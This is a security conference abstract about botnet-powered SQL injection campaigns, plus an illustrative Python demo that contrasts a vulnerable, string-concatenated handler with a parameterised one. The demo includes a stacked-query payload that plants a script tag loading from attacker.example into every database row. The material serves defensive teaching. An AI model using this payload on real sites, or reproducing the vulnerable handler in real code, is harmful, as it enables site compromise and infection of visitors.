Botnet-powered SQL injection attacks: a deeper look within

David Maciejak (Fortinet)
Guillaume Lovet (Fortinet)

  download slides (PDF)

Looking back, the past year has seen botnet-powered SQL injection attacks reach a rampant level, sparing no category of website in their malicious code injection campaigns. With several million reported attempts from several hundred thousand IP addresses, and successfully compromised websites ranging from MTV to the Canadian National Defence, few other threats can boast as high a profile.

Looking within, the threat's internals reveal a sophisticated technique and a steady evolution. As early as May 2008, a new Asprox botnet variant acquired an interesting, and previously unseen, behaviour: it began using search engines such as Google to locate websites with SQL back ends. Once a target was found, it would attempt an SQL injection attack on it, following a simple yet effective scenario: an HTTP GET request is issued that attempts to inject malicious JavaScript into the content database feeding the site's front end, so that the script is later served to every visitor. These blind requests may be repeated with varied parameters, effectively making this early version of the threat a 'brute force' attack.
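The following is an added illustration of the attack class just described, written for this page and not code from the paper or from the Asprox botnet. It models a site endpoint whose GET parameter is concatenated into SQL, shows how one request can write a `<script>` tag into every row of the content table (so the site's own pages later carry the attacker's JavaScript), and contrasts it with a parameterised, validated handler that the same payload cannot touch. The table layout, handler names, parameter name and the `attacker.example` script URL are assumptions made for the illustration; the use of SQLite's `executescript` stands in for a database driver that accepts several statements in one request, which is what makes the stacked-query form of the injection work.

```python
"""
Added example, not code from the paper: a toy model of a botnet-style SQL
injection that plants JavaScript in a site's content database.

Assumptions (not taken from the paper):
  - table 'articles' with a per-article view counter updated on each GET
  - query parameter 'id' is the injection point
  - the script URL http://attacker.example/evil.js is a placeholder
  - executescript() stands in for a DB driver that runs stacked statements
"""
import sqlite3

# Placeholder for the tag an attacker would want every page to serve.
SCRIPT_TAG = '<script src="http://attacker.example/evil.js"></script>'

# Constructed query-string parameters of a single malicious GET request:
# the first statement finishes the site's own UPDATE, the second appends
# the script tag to the body of every article (no WHERE clause).
ATTACK_PARAMS = {
    "id": "1; UPDATE articles SET body = body || '" + SCRIPT_TAG + "'",
}


def make_db():
    """Constructed content database standing in for a CMS back end."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE articles ("
        " id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
        " views INTEGER NOT NULL DEFAULT 0)"
    )
    db.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello world"), ("News", "Nothing new today")],
    )
    db.commit()
    return db


def vulnerable_handler(db, params):
    """Flawed endpoint: the 'id' value is pasted straight into the SQL text.

    executescript() executes every statement in the string, mirroring an
    engine that accepts stacked queries, so the attacker's second statement
    runs with the application's database privileges.
    """
    article_id = params.get("id", "0")
    sql = "UPDATE articles SET views = views + 1 WHERE id = " + article_id
    db.executescript(sql)
    db.commit()
    return True


def hardened_handler(db, params):
    """Same endpoint with input validation and a bound parameter.

    Returns False (the app would answer HTTP 400) when 'id' is not a plain
    integer; otherwise the value is bound, never parsed as SQL.
    """
    article_id = params.get("id", "")
    if not article_id.isdigit():
        return False
    db.execute(
        "UPDATE articles SET views = views + 1 WHERE id = ?",
        (int(article_id),),
    )
    db.commit()
    return True


def count_infected(db):
    """Number of articles whose body now carries the injected script tag."""
    (n,) = db.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE ?",
        ("%" + SCRIPT_TAG + "%",),
    ).fetchone()
    return n


def views(db, article_id):
    """Current view counter for one article (sanity check on the handlers)."""
    (n,) = db.execute(
        "SELECT views FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return n


if __name__ == "__main__":
    db = make_db()
    vulnerable_handler(db, ATTACK_PARAMS)
    print("vulnerable: infected rows =", count_infected(db))
    db = make_db()
    print("hardened: accepted =", hardened_handler(db, ATTACK_PARAMS),
          "infected rows =", count_infected(db))
```

Because the payload carries no WHERE clause, a single accepted request rewrites every row, which is why one blind probe per site is enough for the botnet and why the repeated, parameter-varying requests described above look like brute force in web server logs. Note also that the hardened handler never needs to recognise the payload: binding the value and rejecting anything that is not an integer defeats the whole class, not just this string.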

This paper dissects the attack at a fairly technical level, traces its evolution up to the present, and discusses the protection and mitigation strategies relevant to this class of threat.

